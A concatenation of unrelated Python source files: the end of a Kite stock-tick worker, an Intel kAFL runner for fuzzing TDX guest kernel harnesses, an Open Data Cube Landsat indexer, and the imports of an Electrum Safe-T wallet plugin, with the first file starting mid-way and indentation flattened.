VOL_URL_4 = 'http://localhost:8005/kite/adjust_volatility_4'
REV15_URL = 'http://localhost:8005/kite/adjust_reversal15'
MOM1_URL = 'http://localhost:8005/kite/adjust_mom1'
#Sending data to pnl for trade
PNL_URL = 'http://localhost:8005/kite/pnl_trade'
def downloadEnclosures(q):
"""This is the worker thread function.
It processes items in the queue one after
another. These daemon threads go into an
infinite loop, and only exit when
the main thread ends.
"""
while True:
tick = q.get()
if tick:
#print ('tick received on worker thread')
#print(tick)
analyze_data(tick)
def time_in_range(start, end, x):
"""Return true if x is in the range [start, end]"""
if start <= end:
return start <= x <= end
return start <= x or x <= end
# 0 is Monday, 4 is Friday
def is_weekday(d, start=0, end=4):
return start <= d.weekday() <= end
def on_ticks(ws, ticks):
# Callback to receive ticks.
#print('on tick initiated')
for tick in ticks:
#print(tick)
enclosure_queue.put(tick)
def analyze_data(tick):
instrument_token = tick['instrument_token']
traded_price = tick['last_price']
traded_quantity = tick['last_quantity']
volume = tick['volume']
#print("setting instrument")
qm.set(instrument_token,traded_price,traded_quantity)
priceDict=qm.check_window()
if priceDict:
priceSeries = pd.Series(priceDict)
now = datetime.datetime.now(tz)
stock_is_open = (time_in_range(TRADE_START, TRADE_END, now.time()) and
is_weekday(now))
if stock_is_open :
send_data(CORR_URL, priceSeries.iloc[0])
send_data(CORR_URL_2, priceSeries.iloc[1])
send_data(CORR_URL_STAG, priceSeries.iloc[2])
send_data(TRADE_URL, priceSeries.iloc[3])
send_data(PNL_URL, priceSeries.iloc[4])
send_data(VOL_URL, priceSeries.iloc[5])
send_data(VOL_URL_3, priceSeries.iloc[6])
send_data(VOL_URL_4, priceSeries.iloc[7])
send_data(REV15_URL, priceSeries.iloc[8])
send_data(MOM1_URL, priceSeries.iloc[9])
def send_data(url, tick):
logger.info(url,tick)
#print(requests.get(url + '?data={}'.format([traded_price])).json())
def on_connect(ws, response):
# Callback on successful connect.
print('connected')
global tokens_subset
print(len(tokens_subset))
ws.subscribe(tokens_subset)
#ws.subscribe([NSE_SBIN_INSTRUMENT_TOKEN])
print('subscribed')
ws.set_mode(ws.MODE_FULL, tokens_subset)
#ws.set_mode(ws.MODE_FULL, [NSE_SBIN_INSTRUMENT_TOKEN])
print('mode set for subscription')
def on_close(ws, code, reason):
# On connection close stop the main loop
# Reconnection will not happen after executing `ws.stop()`
ws.stop()
def on_error(ws, code, error):
logger.error(error, code)
def run_ticker(q):
resp = requests.get(UPDATE_TOKEN_URL)
access_token = json.loads(resp.text)['access_token']
# Initialise
kws = KiteTicker(conf.KITE_API_KEY, access_token)
#get list of tokens
kite = KiteConnect(api_key=conf.KITE_API_KEY)
kite.set_access_token(access_token)
print('retrieving tokens list')
data=kite.instruments()
print('list of tokens retrieved')
#retrive instrument tokens from instruments server response
tokens = [f['instrument_token'] for f in data]
#select only 3000 tokens
global tokens_subset
tokens_subset=tokens[:3000]
###############################################
# Assign the callbacks.
kws.on_ticks = on_ticks
kws.on_connect = on_connect
kws.on_close = on_close
kws.on_error = on_error
# Infinite loop on the main thread. Nothing after this will run.
# You have to use the pre-defined callbacks to manage subscriptions.
kws.connect()
q.put(0)
if __name__ == '__main__':
conf = EnvConfig()
load_dotenv(find_dotenv())
tz = pytz.timezone(conf.KITE_TIME_ZONE)
TRADE_START = conf.WEBSOCKET_KITE_START
TRADE_END = conf.WEBSOCKET_KITE_END
TIME_IN_SEC = conf.KITE_FREQUENCY * CLOCK_FREQ
CLOCK = datetime.datetime.now() - datetime.timedelta(seconds=TIME_IN_SEC)
CORR_TIME_IN_SEC = conf.CORR_CALC_FREQ
CORR_CLOCK = datetime.datetime.now() - datetime.timedelta(seconds=CORR_TIME_IN_SEC)
VOL_TIME_IN_SEC = conf.VOL_FREQUENCY
VOL_CLOCK = datetime.datetime.now() - datetime.timedelta(seconds=VOL_TIME_IN_SEC)
worker = Thread(target=downloadEnclosures, args=(enclosure_queue,))
worker.setDaemon(True)
worker.start()
queue = Queue()
while True:
p = Process(target=run_ticker, args=(queue,))
p.start()
p.join() # this blocks until the process terminates
result = queue.get()
|
run_experiments.py
|
#!/usr/bin/env python3
#
# Copyright (C) 2022 Intel Corporation.
#
# This software and the related documents are Intel copyrighted materials, and your use of them is governed by the express license under which they were provided to you ("License"). Unless the License provides otherwise, you may not use, modify, copy, publish, distribute, disclose or transmit this software or the related documents without Intel's prior written permission.
# This software and the related documents are provided as is, with no express or implied warranties, other than those that are expressly stated in the License.
#
# SPDX-License-Identifier: MIT
import re
import os
import pwd
import sys
import subprocess
import time
import argparse
import tempfile
import glob
from timeit import default_timer as timer
from datetime import timedelta
from threading import Thread, Lock
import threading, queue
import multiprocessing
import yaml
FUZZ_SH_PATH = os.path.expandvars("$BKC_ROOT/bkc/kafl/fuzz.sh")
DEFAULT_TIMEOUT_HOURS=2
DEFAULT_COV_TIMEOUT_HOURS=2
REPEATS=1
SEEDS_DIR = os.path.expanduser("~/seeds/harnesses/")
#KAFL_EXTRA_FLAGS="-t 8 --t-soft 3 -tc --trace --log-crashes --kickstart 16"
KAFL_EXTRA_FLAGS="--trace --log-crashes"
HARNESS_PREFIX="CONFIG_TDX_FUZZ_HARNESS_"
KCFLAGS = "-fno-ipa-sra -fno-ipa-cp-clone -fno-ipa-cp"
#HARNESSES = ["DOINITCALLS_LEVEL_3", "DOINITCALLS_LEVEL_4", "DOINITCALLS_LEVEL_5", "DOINITCALLS_LEVEL_6", "DOINITCALLS_LEVEL_7", "CONFIG_TDX_FUZZ_HARNESS_POST_TRAP", "CONFIG_TDX_FUZZ_HARNESS_EARLYBOOT", "CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_PCI", "CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO", "CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_ACPI", "CONFIG_TDX_FUZZ_HARNESS_FULL_BOOT", "CONFIG_TDX_FUZZ_HARNESS_REST_INIT", "CONFIG_TDX_FUZZ_HARNESS_VIRTIO_BLK_PROBE", "BPH_VIRTIO_CONSOLE_INIT", "BPH_EARLY_PCI_SERIAL", "CONFIG_TDX_FUZZ_HARNESS_START_KERNEL", "CONFIG_TDX_FUZZ_HARNESS_DO_BASIC", "CONFIG_TDX_FUZZ_HARNESS_ACPI_EARLY_INIT"]
HARNESSES = [
"DOINITCALLS_LEVEL_3",
"DOINITCALLS_LEVEL_4",
"DOINITCALLS_LEVEL_5",
"DOINITCALLS_LEVEL_6",
"DOINITCALLS_LEVEL_7",
"CONFIG_TDX_FUZZ_HARNESS_POST_TRAP",
"CONFIG_TDX_FUZZ_HARNESS_EARLYBOOT",
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_PCI",
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO",
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_ACPI",
"CONFIG_TDX_FUZZ_HARNESS_FULL_BOOT",
"CONFIG_TDX_FUZZ_HARNESS_REST_INIT",
"CONFIG_TDX_FUZZ_HARNESS_VIRTIO_BLK_PROBE",
"CONFIG_TDX_FUZZ_HARNESS_START_KERNEL",
"CONFIG_TDX_FUZZ_HARNESS_DO_BASIC",
"CONFIG_TDX_FUZZ_HARNESS_ACPI_EARLY_INIT"]
#HARNESSES = ["DOINITCALLS_LEVEL_4"]
BPH_HARNESSES = [
"BPH_ACPI_INIT",
"BPH_VP_MODERN_PROBE",
"BPH_VIRTIO_CONSOLE_INIT",
"BPH_P9_VIRTIO_PROBE",
"BPH_PCI_SUBSYS_INIT",
"BPH_HANDLE_CONTROL_MESSAGE",
"BPH_VIRTIO_PCI_PROBE",
"BPH_PCIBIOS_FIXUP_IRQS"]
HARNESSES = HARNESSES + BPH_HARNESSES
HARNESS_TIMEOUT_OVERRIDES = {
"FULL_BOOT": 24,
"DOINITCALLS_LEVEL_6": 24,
"DOINITCALLS_LEVEL_4": 24,
"DO_BASIC": 24,
}
# Harnesses that run FULL_BOOT with extra kernel boot params
BOOT_PARAM_HARNESSES = {
"BPH_ACPI_INIT": "fuzzing_func_harness=acpi_init",
"BPH_VP_MODERN_PROBE": "fuzzing_func_harness=vp_modern_probe fuzzing_disallow=virtio_pci_find_capability",
"BPH_VIRTIO_CONSOLE_INIT": "fuzzing_func_harness=init",
"BPH_VIRTIO_PCI_PROBE": "fuzzing_func_harness=virtio_pci_probe",
"BPH_P9_VIRTIO_PROBE": "fuzzing_func_harness=p9_virtio_probe",
"BPH_PCI_SUBSYS_INIT": "fuzzing_func_harness=pci_subsys_init",
# TODO: kprobes not avail, do manual harness
# "BPH_EARLY_PCI_SERIAL": "fuzzing_func_harness=setup_early_printk earlyprintk=pciserial,force,00:18.1,115200",
"BPH_PCIBIOS_FIXUP_IRQS": "fuzzing_func_harness=pcibios_fixup_irqs acpi=noirq",
"BPH_HANDLE_CONTROL_MESSAGE": "fuzzing_func_harness=handle_control_message fuzzing_disallow=virtio_pci_find_capability,pci_read_config_dword",
#"FULL_BOOT": "tsc_early_khz=2600",
}
KAFL_PARAM_HARNESSES = {
"FULL_BOOT": "-t 8 -ts 3"
}
DISABLE_HARNESSES = []
command_log = []
"""
# SET these in .config.tmpl
default_config_options = {"CONFIG_TDX_FUZZ_KAFL_DETERMINISTIC": "y",
"CONFIG_TDX_FUZZ_KAFL_DISABLE_CPUID_FUZZ": "y",
"CONFIG_TDX_FUZZ_KAFL_SKIP_IOAPIC_READS": "n",
"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "n",
"CONFIG_TDX_FUZZ_KAFL_SKIP_RNG_SEEDING": "y",
"CONFIG_TDX_FUZZ_KAFL_SKIP_MSR": "n",
"CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "n",
}
"""
harness_config_options = {
"CONFIG_TDX_FUZZ_HARNESS_EARLYBOOT": {"CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "n"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS": {"CONFIG_TDX_FUZZ_KAFL_SKIP_IOAPIC_READS": "y", "CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_FULL_BOOT": {"CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "y"},
"CONFIG_TDX_FUZZ_HARNESS_POST_TRAP": {"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y", "CONFIG_TDX_FUZZ_KAFL_SKIP_PARAVIRT_REWRITE": "y"},
"DOINITCALLS_LEVEL_7": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"DOINITCALLS_LEVEL_6": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"BPH_VIRTIO_CONSOLE_INIT": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_PCI": {"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_VIRTIO": {"CONFIG_TDX_FUZZ_KAFL_VIRTIO": "y"},
"CONFIG_TDX_FUZZ_HARNESS_START_KERNEL": {"CONFIG_TDX_FUZZ_KAFL_SKIP_ACPI_PIO": "y"},
}
config_options_dependencies = {}
kernel_build_mutex = Lock()
q = queue.Queue()
"""
Strips the CONFIG_TDX_HARNESS_ part from the harness name
"""
def normalize_harness_name(s):
return s[len(HARNESS_PREFIX):] if s.startswith(HARNESS_PREFIX) else s
def linux_conf_harness_name(s):
return HARNESS_PREFIX + normalize_harness_name(s)
def name_to_harness(s):
s = s.split("-")[0] # Remove -tmpXXX
if s.startswith("BPH_"):
return s
elif s.startswith("DOINITCALLS_LEVEL_"):
return s
return HARNESS_PREFIX + s
def get_kafl_config_boot_params():
conf_file = os.environ.get("KAFL_CONFIG_FILE")
with open(conf_file) as conf_yaml_file:
conf = yaml.load(conf_yaml_file, Loader=yaml.FullLoader)
default_append = conf.get("qemu_append", "")
return default_append
def get_work_parallelism():
with open(FUZZ_SH_PATH, "r") as fh:
d = fh.read()
matches = re.finditer("KAFL_FULL_OPTS=.*-p\s*(\d+).*", d)
for m in matches:
return int(m.group(1))
def parse_linux_config(fname):
return HARNESSES
"""
harnesses = []
with open(fname, "r") as fh:
config_data = fh.read()
harness_re = re.finditer("CONFIG_TDX_FUZZ_HARNESS_[^=\s]+", config_data)
for m in harness_re:
harness = m.group(0)
if harness in DISABLE_HARNESSES:
continue
harnesses.append(harness)
return harnesses
"""
def generate_setups(harnesses):
setups = set()
for harness in harnesses:
req_conf = ((harness, "y"),)
harness_options = harness_config_options.get(harness, None)
if harness_options:
req_conf = req_conf + tuple(harness_options.items())
if harness.startswith("DOINITCALLS_LEVEL"):
level = harness[len("DOINITCALLS_LEVEL_"):]
req_conf = req_conf + (("CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS", "y"), ("CONFIG_TDX_FUZZ_HARNESS_DOINITCALLS_LEVEL", level),)
if harness.startswith("BPH_"):
req_conf = req_conf + (("CONFIG_TDX_FUZZ_HARNESS_NONE", "y"),)
setups.add(req_conf)
return setups
def build_kernel(setup, linux_source, global_storage_dir, debug=False):
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if debug:
out_stdout = None
out_stderr = None
harness = normalize_harness_name(setup[0][0])
storage_dir = tempfile.mkdtemp(dir=global_storage_dir, prefix=harness+"-")
campaign_name = os.path.basename(storage_dir)
print(f"Configuring kernel for campaign '{campaign_name}'")
old_cwd = os.getcwd()
# Enter Linux CWD
os.chdir(linux_source)
kernel_build_mutex.acquire()
subprocess.run(f"cp .config.tmpl .config", shell=True, stdout=out_stdout, stderr=out_stderr)
print(f"Generating config for {setup}")
for conf,val in setup:
if val is None:
# Handle after all values have been set
pass
else:
subprocess.run(f"./scripts/config --set-val {conf} {val}", shell=True, stdout=out_stdout, stderr=out_stderr)
# Unsets need to happen after setting vals
for conf,val in setup:
if val is None:
subprocess.run(f"./scripts/config -d {conf}", shell=True, stdout=out_stdout, stderr=out_stderr)
print("Building kernel")
kernel_build_path = os.path.join(storage_dir, "build")
os.makedirs(kernel_build_path, exist_ok=True)
subprocess.run(f"make -j $(nproc) KCFLAGS=\"{KCFLAGS}\"", shell=True, stdout=out_stdout, stderr=out_stderr)
#subprocess.run(f"make -j $(nproc)", shell=True, stdout=out_stdout, stderr=out_stderr)
time.sleep(1)
# Copy over built kernel to own directory
subprocess.run(f"cp vmlinux System.map arch/x86/boot/bzImage .config {kernel_build_path}", shell=True, stdout=out_stdout, stderr=out_stderr)
kernel_build_mutex.release()
print(f"Copied kernel for campaign '{campaign_name}' to {kernel_build_path}")
# Reset CWD
os.chdir(old_cwd)
return campaign_name
def run_setup(campaign_name, setup, linux_source, global_storage_dir, debug=False, cpu_offset=0, dry_run=False):
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if debug:
out_stdout = None
out_stderr = None
harness = normalize_harness_name(setup[0][0])
print(f"Preparing campaign '{campaign_name}'")
#campaign_name = time.strftime("%Y%m%d-%H%M%S")
storage_dir = os.path.join(global_storage_dir, campaign_name)
username = pwd.getpwuid(os.getuid()).pw_name
workdir_path = f"/dev/shm/{username}_tdfl-{campaign_name}"
kernel_build_path = os.path.join(storage_dir, "build")
old_cwd = os.getcwd()
# Get default seeds for harness
seeds_dir = None
harness_seeds = os.path.join(SEEDS_DIR, harness)
if os.path.exists(harness_seeds):
seeds_dir = harness_seeds
else:
print(f"Could not find seed dir {harness_seeds}")
seed_str = f"--seed-dir {seeds_dir}" if seeds_dir else ""
print(f"Running campaign {workdir_path} with seeds '{seeds_dir}'")
dry_run_flags = "--abort-exec=10000" if dry_run else ""
timeout = HARNESS_TIMEOUT_OVERRIDES.get(harness, DEFAULT_TIMEOUT_HOURS)
kafl_config_boot_params = get_kafl_config_boot_params()
kernel_boot_params = kafl_config_boot_params + " " + BOOT_PARAM_HARNESSES.get(harness, "")
if len(kernel_boot_params) > 0:
kernel_boot_params = f"--append=\'{kernel_boot_params}\'"
kafl_harness_extra_params = KAFL_PARAM_HARNESSES.get(harness, "")
try:
exc_cmd = f"KAFL_WORKDIR={workdir_path} {FUZZ_SH_PATH} full {kernel_build_path} --abort-time={timeout} --cpu-offset={cpu_offset} {seed_str} {KAFL_EXTRA_FLAGS} {kafl_harness_extra_params} {dry_run_flags} {kernel_boot_params}"
command_log.append(exc_cmd)
#with open(os.path.join(workdir_path, "cmd"), "w") as f:
# print(exc_cmd, file=f)
subprocess.run(exc_cmd, shell=True, timeout=timeout * 3600 + 60, stdout=out_stdout, stderr=out_stderr)
except subprocess.TimeoutExpired as e:
print(e)
# Wait for stuff to settle down... might not be necessary
print(f"Done running campaign {workdir_path}")
time.sleep(2)
subprocess.run(f"{FUZZ_SH_PATH} ranges {workdir_path} > {workdir_path}/pt_ranges.txt", shell=True, stdout=out_stdout, stderr=out_stderr)
subprocess.run(f"mv {workdir_path}/* {storage_dir}", shell=True, stdout=out_stdout, stderr=out_stderr)
subprocess.run(f"rm -r {workdir_path}", shell=True, stdout=out_stdout, stderr=out_stderr)
target_dir = os.path.join(storage_dir, "target")
if not os.path.isdir(target_dir):
print(f"Could not find ./target/ in '{storage_dir}'. Something most likely went wrong. Doing a manual copy.")
os.makedirs(target_dir, exist_ok=True)
## HACK: overwrite ./target/ copied by fuzz.sh since vmlinux could have changed due to parallel campaign compilation
#subprocess.run(f"cp {kernel_build_path}/* {target_dir}", shell=True, stdout=out_stdout, stderr=out_stderr)
def worker(i, work_parallelism, stop, dry_run):
cpu_offset = i*work_parallelism
print(f"Starting worker thread {i} with cpu-offset {cpu_offset} (work_parallelism={work_parallelism})")
while True:
try:
work_args = q.get(timeout=1)
run_setup(*work_args, cpu_offset=cpu_offset, dry_run=dry_run)
q.task_done()
except queue.Empty:
if stop():
break
def do_cov(args):
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if args.debug:
out_stdout = None
out_stderr = None
for d in glob.glob(args.storage_dir + "/*/"):
exp_name = os.path.basename(os.path.normpath(d))
harness = normalize_harness_name(name_to_harness(exp_name))
if harness in args.skip_harness:
continue
# Skip coverage gathering for campaigns that already have linecov.lst
if (not args.rerun) and os.path.exists(os.path.join(d, "traces/linecov.lst")):
continue
ncpu = args.work_parallelism * args.p
kafl_config_boot_params = get_kafl_config_boot_params()
kernel_boot_params = kafl_config_boot_params + " " + BOOT_PARAM_HARNESSES.get(harness, "")
if len(kernel_boot_params) > 0:
kernel_boot_params = f"--append=\'{kernel_boot_params}\'"
cmd_cov = f"{FUZZ_SH_PATH} cov {d} -p {ncpu} {kernel_boot_params}"
cmd_smatch = f"USE_GHIDRA=1 {FUZZ_SH_PATH} smatch {d}"
print(f"Gathering coverage for '{d}' with -p {ncpu}")
subprocess.run(cmd_cov, shell=True, stdout=out_stdout, stderr=out_stderr)
subprocess.run(cmd_smatch, shell=True, stdout=out_stdout, stderr=out_stderr)
#print(cmd_cov)
#print(cmd_smatch)
print(f"DONE Gathering coverage for '{d}' with -p {ncpu}\n")
def do_run(args):
linux_src = args.linux_src
storage_dir = args.storage_dir
if not args.allow_existing_dir and os.path.isdir(storage_dir):
print(f"Storage path '{storage_dir}' already exists. Please choose a new dir.")
sys.exit(1)
os.makedirs(storage_dir, exist_ok=True)
linux_config_path = os.path.join(linux_src, ".config")
linux_config_tmpl_path = os.path.join(linux_src, ".config.tmpl")
linux_config_bak_path = os.path.join(linux_src, ".config.fuzz.bak")
print(f"Backing up .config to {linux_config_bak_path}")
subprocess.run(f"cp {linux_config_path} {linux_config_bak_path}", shell=True)
if os.path.isfile(linux_config_tmpl_path):
print(f"Using Kernel config template '{linux_config_tmpl_path}'")
else:
print(f"Kernel .config template file '{linux_config_tmpl_path}' does not exists, using ' {linux_config_path}'")
subprocess.run(f"cp {linux_config_path} {linux_config_tmpl_path}", shell=True)
harnesses = parse_linux_config(linux_config_path)
setups = generate_setups(harnesses)
print("Campaign will run {} different setups".format(len(setups)))
# Start up workers
work_parallelism = args.work_parallelism
if args.overcommit is False and work_parallelism * args.p > multiprocessing.cpu_count():
print(f"Using more parallelism than cores available ({work_parallelism} * {args.p} > {multiprocessing.cpu_count()})!! If you really want this, specify --overcommit")
sys.exit(1)
start = timer()
for setup in setups:
#run_setup(setup, linux_src, storage_dir, debug=args.debug)
for i in range(REPEATS):
# TODO: no need to build separate kernels for repeats. Needs refactoring
campaign_name = build_kernel(setup, linux_src, storage_dir, debug=True)
q.put((campaign_name, setup, linux_src, storage_dir, args.debug))
threads = []
# Condition variable. No need for it to be atomic..
stop_threads = False
for i in range(args.p):
t = threading.Thread(target=worker, args=(i, work_parallelism, lambda: stop_threads, args.dry_run))
threads.append(t)
t.start()
subprocess.run(f"mv {linux_config_bak_path} {linux_config_path}", shell=True)
# block until all campaigns are done
q.join()
end = timer()
print("Campaign ran {} different setups in {}".format(len(setups), (timedelta(seconds=end-start))))
stop_threads = True
for t in threads:
t.join()
out_stdout = subprocess.DEVNULL
out_stderr = subprocess.DEVNULL
if args.debug:
out_stdout = None
out_stderr = None
print("Command log:")
for cmd in command_log:
print(cmd)
print("END command log")
if args.coverage:
for d in glob.glob(storage_dir + "/*"):
ncpu = work_parallelism * args.p
#ncpu = args.p
harness = name_to_harness(d)
if harness in args.skip_harness:
continue
kernel_boot_params = BOOT_PARAM_HARNESSES.get(harness, "")
if len(kernel_boot_params) > 0:
kernel_boot_params = f"--append=\'{kernel_boot_params}\'"
cmd_cov = f"{FUZZ_SH_PATH} cov {d} -p {ncpu} {kernel_boot_params}"
cmd_smatch = f"USE_GHIDRA=1 {FUZZ_SH_PATH} smatch {d}"
print(f"Gathering coverage for '{d}' with -p {ncpu}")
try:
subprocess.run(cmd_cov, shell=True, stdout=out_stdout, stderr=out_stderr, timeout=DEFAULT_COV_TIMEOUT_HOURS*3600)
subprocess.run(cmd_smatch, shell=True, stdout=out_stdout, stderr=out_stderr, timeout=DEFAULT_COV_TIMEOUT_HOURS*3600)
except subprocess.TimeoutExpired as e:
print(f"TIMEOUT while getting coverage for '{d}'")
print(f"DONE Gathering coverage for '{d}' with -p {ncpu}")
def parse_args():
def parse_as_path(pathname):
return os.path.abspath(
os.path.expanduser(
os.path.expandvars(pathname)))
def parse_as_file(filename):
expanded = parse_as_path(filename)
if not os.path.exists(expanded):
raise argparse.ArgumentTypeError("Failed to find file argument %s (expanded: %s)" % (filename, expanded))
return expanded
def parse_as_dir(dirname):
expanded = parse_as_path(dirname)
if not os.path.exists(expanded):
raise argparse.ArgumentTypeError("Failed to find file argument %s (expanded: %s)" % (dirname, expanded))
return expanded
main_parser = argparse.ArgumentParser(description='kAFL TDX fuzzing experiments runner.')
subparsers = main_parser.add_subparsers(dest='action', metavar='<action>', required=True)
cov_parser = subparsers.add_parser("cov", help="collect coverage")
run_parser = subparsers.add_parser("run", help="run campaigns")
cov_parser.add_argument('storage_dir', metavar='<storage_dir>', type=str,
help='target dir containing the results of prior fuzzing run')
cov_parser.add_argument('--rerun', action="store_true",
help='Force rerun of coverage gathering')
run_parser.add_argument('linux_src', metavar='<linux_src>', type=parse_as_dir,
help='path to your linux kernel tree')
run_parser.add_argument('storage_dir', metavar='<storage_dir>', type=parse_as_path,
help='target dir to store the results. will be created / must not exist.')
run_parser.add_argument('--allow-existing-dir', action="store_true",
help='Allow storing results in existing dir')
run_parser.add_argument('--dry-run', action="store_true",
help='Perform dry run')
run_parser.add_argument('-c', '--coverage', action="store_true",
help='Gather coverage + smatch after running campaigns')
run_parser.add_argument('--launcher', type=parse_as_file, default="$BKC_ROOT/bkc/kafl/fuzz.sh",
help='fuzzer launch script (default: $BKC_ROOT/bkc/kafl/fuzz.sh)')
main_parser.add_argument('--debug', action='store_true',
help='Turn on debug output (show fuzzer stdout/stderr)')
main_parser.add_argument('-p', metavar='<n>', type=int, default=1,
help='Parallelize workload')
main_parser.add_argument('--work_parallelism', metavar='<n>', type=int, default=get_work_parallelism(),
help='Parallelism used by fuzzer. Only use for manual override, automatically obtained from fuzz.sh')
main_parser.add_argument('--overcommit', type=bool, default=False,
help='Overcommit parallelization')
main_parser.add_argument('--skip-harness', nargs="*", type=str, default=[],
help='Skip processing for specified harnesses')
return main_parser.parse_args()
def main():
args = parse_args()
if not os.path.exists(FUZZ_SH_PATH):
print("Could not find kAFL launcher in %s. Exit" % FUZZ_SH_PATH)
return
if not "KAFL_CONFIG_FILE" in os.environ:
print("KAFL_CONFIG_FILE not in environment. Have you setup the right kAFL environment (make env)?")
sys.exit(1)
if args.action == "cov":
do_cov(args)
if args.action == "run":
do_run(args)
if __name__ == "__main__":
main()
|
autoIndex.py
|
#!/usr/bin/env python3
import json
import logging
from multiprocessing import Manager, Process, cpu_count, current_process
from queue import Empty
from urllib.parse import urlparse
import boto3
import click
import datacube
from botocore import UNSIGNED
from botocore.config import Config
from ls_public_bucket import (_parse_group, add_dataset, get_s3_url,
make_metadata_doc)
from satsearch import Search
import traceback as tb
STOP_SIGN = "ALL_COMPLETE_END_WORKER"
logger = logging.getLogger('odcindexer')
def stac_search(extent, start_date, end_date):
""" Convert lat, lon to pathrows """
logger.info("Querying STAC for area: {} and times: {} - {} (UTC)".format(extent, start_date, end_date))
srch = Search(
bbox=extent,
time='{}T00:00:00Z/{}T23:59:59Z'.format(start_date, end_date),
url="https://sat-api.developmentseed.org/stac/search"
)
try:
logger.info("Found {} items".format(srch.found()))
return srch
except KeyError as e:
tb.print_exc()
return None
def index_dataset(index, s3, url, parse_only):
logger.info("Downloading {}".format(url))
bucket_name, key = parse_s3_url(url)
obj = s3.Object(bucket_name, key).get()
raw = obj['Body'].read()
raw_string = raw.decode('utf8')
logger.info("Parsing {}".format(key))
try:
txt_doc = _parse_group(iter(raw_string.split("\n")))['L1_METADATA_FILE']
data = make_metadata_doc(txt_doc, bucket_name, key)
except Exception as e:
logger.error("Metadata parsing error: {}; {}".format(e.__class__.__name__, e))
return
uri = get_s3_url(bucket_name, key)
if parse_only:
logger.info("Skipping indexing step")
else:
logger.info("Indexing {}".format(key))
add_dataset(data, uri, index, "verify")
def index_datasets(items, parse_only=False):
s3 = boto3.resource("s3", config=Config(signature_version=UNSIGNED))
dc = datacube.Datacube()
idx = dc.index
for item in items:
if "MTL" in item.assets:
index_dataset(idx, s3, item.assets["MTL"]["href"], parse_only)
else:
logger.info("Item {} does not have an MTL asset (Sentinel2?) - skipping".format(item))
def worker(parse_only, queue):
s3 = boto3.resource("s3", config=Config(signature_version=UNSIGNED))
dc = datacube.Datacube()
idx = dc.index
while True:
try:
url = queue.get(timeout=60)
if url == STOP_SIGN:
break
logging.info("Processing {} {}".format(url, current_process()))
index_dataset(idx, s3, url, parse_only)
queue.task_done()
except Empty:
break
except EOFError:
break
def index_datasets_multi(items, parse_only=False):
manager = Manager()
queue = manager.Queue()
worker_count = cpu_count() * 2
processes = []
for i in range(worker_count):
proc = Process(target=worker, args=[parse_only, queue])
processes.append(proc)
proc.start()
for item in items:
if "MTL" in item.assets:
queue.put(item.assets["MTL"]["href"])
else:
logger.info("Item {} does not have an MTL asset (Sentinel2?) - skipping".format(item))
for i in range(worker_count):
queue.put(STOP_SIGN)
for proc in processes:
proc.join()
def parse_s3_url(url):
o = urlparse(url)
if o.netloc.startswith("s3"):
# https://s3-{region}.amazonaws.com/{bucket-name}/{key}
bucket_name, key = o.path.split("/", 2)[1:]
else:
# https://{bucket-name}.s3.amazonaws.com/{key}
bucket_name = o.netloc.split(".")[0]
key = o.path.split("/", 1)[1]
return bucket_name, key
@click.command()
@click.option('--extents', '-e', default="146.30,146.83,-43.54,-43.20", help="Extent to index in the form lon_min,lon_max,lat_min,latmax")
@click.option('--start_date', default="2013-02-11", help="Start date of the acquisitions to index, in YYYY-MM-DD format (UTC)")
@click.option('--end_date', default="2099-12-31", help="End date of the acquisitions to index, in YYYY-MM-DD format (UTC)")
@click.option('--single_process_only', is_flag=True, help="If true, multi-processing is disabled")
@click.option('--parse_only', '-p', is_flag=True, help="If true, scan STAC and parse MTL files, but do not index into datacube")
def index(extents, start_date, end_date, single_process_only, parse_only, write_extents=True):
lon_min, lon_max, lat_min, lat_max = map(float, extents.split(','))
if write_extents and not parse_only:
with open('/opt/odc/data/configIndex.txt', 'w') as outfile:
json.dump({'extent': [lon_min, lon_max, lat_min, lat_max]}, outfile)
srch = stac_search([lon_min, lat_min, lon_max, lat_max], start_date, end_date)
if not srch:
logging.error("STAC search failed, stopping.")
return
logging.info("Indexing datasets...")
if single_process_only:
index_datasets(srch.items(), parse_only)
else:
index_datasets_multi(srch.items(), parse_only)
logging.info("And we're done!")
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
logger.info("Starting the index process")
index()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
